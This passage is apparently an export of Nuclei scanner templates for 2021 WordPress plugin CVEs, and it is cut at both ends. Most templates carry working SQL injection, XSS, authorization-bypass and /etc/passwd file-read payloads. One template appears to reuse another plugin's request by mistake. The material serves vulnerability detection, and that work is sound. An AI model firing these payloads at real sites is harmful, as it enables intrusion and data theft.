post_data:\n - \"action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--\"\n - \"action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`\"\n\n stop-at-first-match: true\n matchers:\n - type: dsl\n dsl:\n - 'duration>=5'\n - 'status_code == 200'\n - 'contains(header, \"application/json\")'\n - 'contains(body, \"success\")'\n condition: and\n# digest: 4b0a00483046022100ade9023a98f1e582ced87da228df4387a9351ee1bc7d0f80b959b1c01efe9301022100a724a4b3f7b0d2716fa368d0014ba7c027ba80d657109e06ec9571050764a3e9:922c64590222798bb761d5b6d8e72950", "hash": "86a1f345cb756058879c2adb43693b26", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082d3" }, "name": "CVE-2021-24862.yaml", "content": "id: CVE-2021-24862\n\ninfo:\n name: WordPress RegistrationMagic <5.0.1.6 - Authenticated SQL Injection\n author: theamanrawat\n severity: high\n description: |\n WordPress RegistrationMagic plugin before 5.0.1.6 contains an authenticated SQL injection vulnerability. The plugin does not escape user input in its rm_chronos_ajax AJAX action before using it in a SQL statement when duplicating tasks in batches. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. 
This is a potential issue in both WordPress and WordPress Administrator.\n impact: |\n An authenticated attacker can execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: Fixed in version 5.0.1.6.\n reference:\n - https://wpscan.com/vulnerability/7d3af3b5-5548-419d-aa32-1f7b51622615\n - https://wordpress.org/plugins/custom-registration-form-builder-with-submission-manager/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24862\n - http://packetstormsecurity.com/files/165746/WordPress-RegistrationMagic-V-5.0.1.5-SQL-Injection.html\n - https://github.com/ezelnur6327/ezelnur6327\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2021-24862\n cwe-id: CWE-89\n epss-score: 0.72686\n epss-percentile: 0.97816\n cpe: cpe:2.3:a:metagauss:registrationmagic:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: metagauss\n product: registrationmagic\n framework: wordpress\n tags: cve,cve2021,wpscan,wp-plugin,wordpress,wp,registrationmagic,sqli,authenticated,packetstorm,metagauss\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n @timeout: 10s\n GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/custom-registration-form-builder-with-submission-manager/admin/js/script_rm_utilities.js HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration_2>=6'\n - 'status_code_2 == 200'\n - 'contains(body_3, \"rm_user_role_mananger_form\")'\n condition: and\n# digest: 
4a0a00473045022100e291dd94c5d8a5cf0d02cbfdd5212108c69acd79b92db5c04881b59af89449040220781cf0b9c9e4ff06f64c490aaecc845f875e184b75df4413f58b712af3304d65:922c64590222798bb761d5b6d8e72950", "hash": "3e93ebe951bcc23db51ebf8ad77ebfc0", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082d4" }, "name": "CVE-2021-24875.yaml", "content": "id: CVE-2021-24875\n\ninfo:\n name: WordPress eCommerce Product Catalog <3.0.39 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress eCommerce Product Catalog plugin before 3.0.39 contains a cross-site scripting vulnerability. The plugin does not escape the ic-settings-search parameter before outputting it back in the page in an attribute. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in version 3.0.39.\n reference:\n - https://wpscan.com/vulnerability/652efc4a-f931-4668-ae74-a58b288a5715\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24875\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24875\n cwe-id: CWE-79\n epss-score: 0.00143\n epss-percentile: 0.50097\n cpe: cpe:2.3:a:implecode:ecommerce_product_catalog:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: implecode\n product: ecommerce_product_catalog\n framework: wordpress\n tags: cve2021,cve,wp,authenticated,wpscan,ecommerce-product-catalog,xss,wordpress,wp-plugin,implecode\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n 
log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/edit.php?post_type=al_product&page=product-settings.php&ic-settings-search=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body_2, \"alert(document.domain)\")'\n - 'contains(body_2, \"eCommerce Product Catalog\")'\n condition: and\n# digest: 4a0a0047304502210090b957beb8440eaf4acf667c971c051694c39e18b33a8a8b31ae16d36d5f56fa0220598145a711dd9feeef1155fb5654ff6abd36cc88b7decadc8e3ea432ed896fbf:922c64590222798bb761d5b6d8e72950", "hash": "1d7423a08bc0fe170813f01dfc480425", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082d5" }, "name": "CVE-2021-24891.yaml", "content": "id: CVE-2021-24891\n\ninfo:\n name: WordPress Elementor Website Builder <3.1.4 - Cross-Site Scripting\n author: dhiyaneshDk\n severity: medium\n description: |\n WordPress Elementor Website Builder plugin before 3.1.4 contains a DOM cross-site scripting vulnerability. 
It does not sanitize or escape user input appended to the DOM via a malicious hash.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update WordPress Elementor Website Builder to version 3.1.4 or later to mitigate this vulnerability.\n reference:\n - https://www.jbelamor.com/xss-elementor-lightox.html\n - https://wpscan.com/vulnerability/fbed0daa-007d-4f91-8d87-4bca7781de2d\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24891\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24891\n cwe-id: CWE-79\n epss-score: 0.00116\n epss-percentile: 0.45185\n cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: elementor\n product: website_builder\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,elementor,wpscan,dom,xss\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/elementor/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Elementor Website Builder'\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/elementor/assets/js/frontend.min.js\"\n - \"{{BaseURL}}/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9\"\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - compare_versions(version, '> 1.5.0', '< 3.1.4') && status_code_1 == 200 && status_code_2 == 200\n\n - type: regex\n part: body_1\n regex:\n - \"elementor[\\\\s-]*v(([0-3]+\\\\.(([0-5]+\\\\.[0-5]+)|[0-4]+\\\\.[0-9]+))|[0-2]+[0-9.]+)\"\n\n extractors:\n - type: regex\n name: version\n group: 1\n regex:\n - \"elementor[\\\\s-]*v(([0-3]+\\\\.(([0-5]+\\\\.[0-5]+)|[0-4]+\\\\.[0-9]+))|[0-2]+[0-9.]+)\"\n internal: 
true\n\n - type: kval\n kval:\n - version\n# digest: 490a0046304402205b282380b349f854fb682c0a9e29f9260987ccc282a94ff7317206ba7e3d03db022055093df9a46c6e757eac59c584cb657f373924eae480a7af9c82cf24c168f3a8:922c64590222798bb761d5b6d8e72950", "hash": "edddbfb037aede9dae2076ad4a9d85e8", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082d6" }, "name": "CVE-2021-24910.yaml", "content": "id: CVE-2021-24910\n\ninfo:\n name: WordPress Transposh Translation <1.0.8 - Cross-Site Scripting\n author: Screamy\n severity: medium\n description: WordPress Transposh Translation plugin before 1.0.8 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the a parameter via an AJAX action (available to both unauthenticated and authenticated users when the curl library is installed) before outputting it back in the response.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update the WordPress Transposh Translation plugin to version 1.0.8 or later to mitigate the vulnerability.\n reference:\n - https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/\n - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-24910.txt\n - https://wpscan.com/vulnerability/b5cbebf4-5749-41a0-8be3-3333853fca17\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24910\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24910\n cwe-id: CWE-79\n epss-score: 0.00086\n epss-percentile: 0.35299\n cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: transposh\n product: transposh_wordpress_translation\n framework: wordpress\n tags: 
cve2021,cve,wordpress,wp-plugin,xss,wp,wpscan,transposh\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&tl=en&q=\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - '{\"result\":'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d37fe0b4e214f6873d85a658650c7498aebf4e3ab8c22a05b2f65796d3e8928c022012536e11e361e1aee564b3dc6f01349c49f76792d86b982708b7c86bf3f3188f:922c64590222798bb761d5b6d8e72950", "hash": "8130a2ebff1bc42cb072c437c11acca2", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082d7" }, "name": "CVE-2021-24915.yaml", "content": "id: CVE-2021-24915\n\ninfo:\n name: Contest Gallery < 13.1.0.6 - SQL injection\n author: r3Y3r53\n severity: critical\n description: |\n The plugin does not have capability checks and does not sanitise or escape the cg-search-user-name-original parameter before using it in a SQL statement when exporting users from a gallery, which could allow unauthenticated to perform SQL injections attacks, as well as get the list of all users registered on the blog, including their username and email address.\n remediation: Fixed in version 13.1.0.6\n reference:\n - https://wpscan.com/vulnerability/45ee86a7-1497-4c81-98b8-9a8e5b3d4fac\n - https://gist.github.com/tpmiller87/6c05596fe27dd6f69f1aaba4cbb9c917\n - https://wordpress.org/plugins/contest-gallery/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24915\n cwe-id: CWE-89\n epss-score: 0.22351\n epss-percentile: 0.96057\n cpe: cpe:2.3:a:contest_gallery:contest_gallery:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: contest_gallery\n product: contest_gallery\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/contest-gallery/\"\n tags: 
cve2021,cve,wordpress,wp-plugin,wpscan,wp,contest-gallery,contest_gallery,sqli\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n cg-search-user-name=&cg-search-user-name-original=%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x717a6b7871%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x716b707871%29%2CNULL--%20-&cg_create_user_data_csv_new_export=true&cg-search-gallery-id-original=&cg-search-gallery-id=&cg_create_user_data_csv=true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'WpUserId'\n - 'Username'\n - 'Usermail'\n condition: and\n\n - type: word\n part: header\n words:\n - 'text/csv'\n - 'filename='\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220029f49c1e9fa65765eaed8f0325876a75a3da15cad0b9597a1e000f69de3c11f0221008d79ba2600b7e68952c628b0a919d453f58c97dfbc68070006af2ede9825963b:922c64590222798bb761d5b6d8e72950", "hash": "bec4ec6fccc8421a0e63474dde53a546", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082d8" }, "name": "CVE-2021-24917.yaml", "content": "id: CVE-2021-24917\n\ninfo:\n name: WordPress WPS Hide Login <1.9.1 - Information Disclosure\n author: akincibor\n severity: high\n description: WordPress WPS Hide Login plugin before 1.9.1 is susceptible to incorrect authorization. An attacker can obtain the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user. 
This reveals the secret login location.\n impact: |\n An attacker can gain sensitive information about the WordPress site, such as the login page URL.\n remediation: Fixed in version 1.9.1.\n reference:\n - https://wpscan.com/vulnerability/15bb711a-7d70-4891-b7a2-c473e3e8b375\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24917\n - https://wordpress.org/support/topic/bypass-security-issue/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-24917\n cwe-id: CWE-863\n epss-score: 0.03563\n epss-percentile: 0.90675\n cpe: cpe:2.3:a:wpserveur:wps_hide_login:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wpserveur\n product: wps_hide_login\n framework: wordpress\n tags: cve2021,cve,wp,wordpress,wp-plugin,unauth,wpscan,wpserveur\n\nhttp:\n - raw:\n - |\n GET /wp-admin/options.php HTTP/1.1\n Host: {{Hostname}}\n Referer: something\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - \"!contains(tolower(location), 'wp-login.php')\"\n\n - type: word\n part: header\n words:\n - 'redirect_to=%2Fwp-admin%2Fsomething&reauth=1'\n\n extractors:\n - type: kval\n kval:\n - location\n# digest: 4b0a00483046022100aa02258a3fe31969b26abef88381abc8502bee1888b8beaa33762c32b70968cf0221008b4c288173be99e17f8cbfc8dec7f1a886966396d1bc254fb80b1ba526800975:922c64590222798bb761d5b6d8e72950", "hash": "f03e838df507d9ef2e16facfe0fd9b29", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082d9" }, "name": "CVE-2021-24926.yaml", "content": "id: CVE-2021-24926\n\ninfo:\n name: WordPress Domain Check <1.0.17 - Cross-Site Scripting\n author: cckuailong\n severity: medium\n description: WordPress Domain Check plugin before 1.0.17 contains a reflected cross-site scripting vulnerability. 
It does not sanitize and escape the domain parameter before outputting it back in the page.\n remediation: |\n Update to WordPress Domain Check plugin version 1.0.17 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24926\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24926\n cwe-id: CWE-79\n epss-score: 0.00171\n epss-percentile: 0.53153\n cpe: cpe:2.3:a:domaincheckplugin:domain_check:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: domaincheckplugin\n product: domain_check\n framework: wordpress\n tags: cve,cve2021,wpscan,xss,wp,wordpress,wp-plugin,authenticated,domaincheckplugin\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"Domain Check\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d0f4d9bfcc048f509d4adc32bc55b484ffb0c20b4119b906aae940c8cd858c120220778eacf2b57cdec131c557397df891c5923101ad74b0501c14fcd71964089258:922c64590222798bb761d5b6d8e72950", "hash": "2410844c798338b5777f26cc4dba0160", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082da" }, "name": "CVE-2021-24931.yaml", "content": "id: CVE-2021-24931\n\ninfo:\n name: WordPress Secure Copy Content Protection and Content Locking <2.8.2 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n WordPress 
Secure Copy Content Protection and Content Locking plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action, available to both unauthenticated and authenticated users, before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database.\n remediation: Fixed in version 2.8.2.\n reference:\n - https://wpscan.com/vulnerability/1cd52d61-af75-43ed-9b99-b46c471c4231\n - https://wordpress.org/plugins/secure-copy-content-protection/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24931\n - http://packetstormsecurity.com/files/165946/WordPress-Secure-Copy-Content-Protection-And-Content-Locking-2.8.1-SQL-Injection.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24931\n cwe-id: CWE-89\n epss-score: 0.58114\n epss-percentile: 0.97428\n cpe: cpe:2.3:a:ays-pro:secure_copy_content_protection_and_content_locking:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: ays-pro\n product: secure_copy_content_protection_and_content_locking\n framework: wordpress\n tags: cve2021,cve,wp-plugin,wp,packetstorm,unauth,wpscan,sqli,wordpress,secure-copy-content-protection,ays-pro\n\nhttp:\n - raw:\n - |\n @timeout: 20s\n GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"{\\\"status\\\":true\")'\n condition: and\n# digest: 
4b0a00483046022100bd6a79cdc594a3023fb8e143f8b3806237e2d1b610802729545d42772e7340e10221008215d1a8a12f869971241e710ddfd7c6f663f9e5a94326ce397d081c4f966528:922c64590222798bb761d5b6d8e72950", "hash": "1e7ceaec565d084ec89125978c35bbd2", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082db" }, "name": "CVE-2021-24940.yaml", "content": "id: CVE-2021-24940\n\ninfo:\n name: WordPress Persian Woocommerce <=5.8.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: |\n WordPress Persian Woocommerce plugin through 5.8.0 contains a cross-site scripting vulnerability. The plugin does not escape the s parameter before outputting it back in an attribute in the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and possibly steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in 5.9.8.\n reference:\n - https://wpscan.com/vulnerability/1980c5ca-447d-4875-b542-9212cc7ff77f\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24940\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24940\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42899\n cpe: cpe:2.3:a:woocommerce:persian-woocommerce:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: woocommerce\n product: persian-woocommerce\n framework: wordpress\n tags: cve2021,cve,wp,xss,authenticated,wpscan,wordpress,wp-plugin,woocommerce\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: 
application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php?page=persian-wc&s=xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22 HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - contains(header_2, \"text/html\")\n - status_code_2 == 200\n - contains(body_2, 'accesskey=X onclick=alert(1) test=')\n - contains(body_2, 'woocommerce_persian_translate')\n condition: and\n# digest: 4b0a00483046022100b7047b7f826c9feeea2a1e804ec10dee788c3f73bf6a15b7f203b50f4b63af08022100b8021e9cb1d934188fbe23f2ce21be31736eec16f8f4d29453819a12fab97e43:922c64590222798bb761d5b6d8e72950", "hash": "a25cb865a8dae3f8bae62a683e9794ad", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082dc" }, "name": "CVE-2021-24943.yaml", "content": "id: CVE-2021-24943\n\ninfo:\n name: Registrations for the Events Calendar < 2.7.6 - SQL Injection\n author: ritikchaddha\n severity: critical\n description: |\n The Registrations for the Events Calendar WordPress plugin before 2.7.6 does not sanitise and escape the event_id in the rtec_send_unregister_link AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL injection.\n remediation: Fixed in 2.7.6\n reference:\n - https://wpscan.com/vulnerability/ba50c590-42ee-4523-8aa0-87ac644b77ed/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24943\n - https://wordpress.org/plugins/registrations-for-the-events-calendar/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24943\n cwe-id: CWE-89\n epss-score: 0.21158\n epss-percentile: 0.96299\n cpe: cpe:2.3:a:roundupwp:registrations_for_the_events_calendar:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: roundupwp\n product: registrations_for_the_events_calendar\n framework: wordpress\n publicwww-query: 
\"/wp-content/plugins/registrations-for-the-events-calendar/\"\n tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar\nvariables:\n text: \"{{rand_base(5)}}\"\n\nhttp:\n - raw:\n - |\n @timeout: 20s\n POST /wp-admin/admin-ajax.php?action=rtec_send_unregister_link HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n event_id=3 AND (SELECT 1874 FROM (SELECT(SLEEP(5)))vNpy)&email={{text}}@{{text}}.com\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=5'\n - 'status_code == 200'\n - 'contains(body, \"Please enter the email you registered with\")'\n condition: and\n# digest: 4b0a00483046022100b80877af0947d3a8a37e4c34281cf76f8f00154d90974a6dd87bf80d91980837022100eabb89ae18f62fe2508c9fdc28dc7316c524d8dc3a6d1cd28f28d8cc14f0b9f8:922c64590222798bb761d5b6d8e72950", "hash": "cfce3c4a938f95ae6d5c074d0366a1d5", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082dd" }, "name": "CVE-2021-24946.yaml", "content": "id: CVE-2021-24946\n\ninfo:\n name: WordPress Modern Events Calendar <6.1.5 - Blind SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n WordPress Modern Events Calendar plugin before 6.1.5 is susceptible to blind SQL injection. The plugin does not sanitize and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action. 
An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.\n remediation: |\n Upgrade to WordPress Modern Events Calendar version 6.1.5 or later to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/09871847-1d6a-4dfe-8a8c-f2f53ff87445\n - https://wordpress.org/plugins/modern-events-calendar-lite/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24946\n - http://packetstormsecurity.com/files/165742/WordPress-Modern-Events-Calendar-6.1-SQL-Injection.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24946\n cwe-id: CWE-89\n epss-score: 0.12445\n epss-percentile: 0.94942\n cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: webnus\n product: modern_events_calendar_lite\n framework: wordpress\n tags: cve2021,cve,sqli,packetstorm,wp,wp-plugin,unauth,wpscan,modern-events-calendar-lite,wordpress,webnus\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n GET /wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200 || status_code == 500'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"The event is finished\") || contains(body, \"been a critical error\")'\n condition: and\n# digest: 4a0a004730450220639f36ec2923e5c1fa51bab912bd571fed2585b6cbe587796844a913eb606c6e022100d5fa2051f016ff2940ca7e37b26ed07563aa7272b2bc5f69a8a4b96dd0f549d3:922c64590222798bb761d5b6d8e72950", "hash": "136c0ea5d8745379eba5075dc1f1338f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": 
"66477a413521042ccf3082de" }, "name": "CVE-2021-24947.yaml", "content": "id: CVE-2021-24947\n\ninfo:\n name: WordPress Responsive Vector Maps < 6.4.2 - Arbitrary File Read\n author: cckuailong\n severity: medium\n description: WordPress Responsive Vector Maps < 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server.\n impact: |\n An attacker can read sensitive files on the server, potentially leading to unauthorized access or exposure of sensitive information.\n remediation: |\n Update WordPress Responsive Vector Maps plugin to version 6.4.2 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/c6bb12b1-6961-40bd-9110-edfa9ee41a18\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24947\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/kazet/wpgarlic\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-24947\n cwe-id: CWE-352,CWE-863\n epss-score: 0.00315\n epss-percentile: 0.69672\n cpe: cpe:2.3:a:thinkupthemes:responsive_vector_maps:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: thinkupthemes\n product: responsive_vector_maps\n framework: wordpress\n tags: cve2021,cve,authenticated,wpscan,lfi,wp,wordpress,wp-plugin,lfr,thinkupthemes\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1\n Host: {{Hostname}}\n\n 
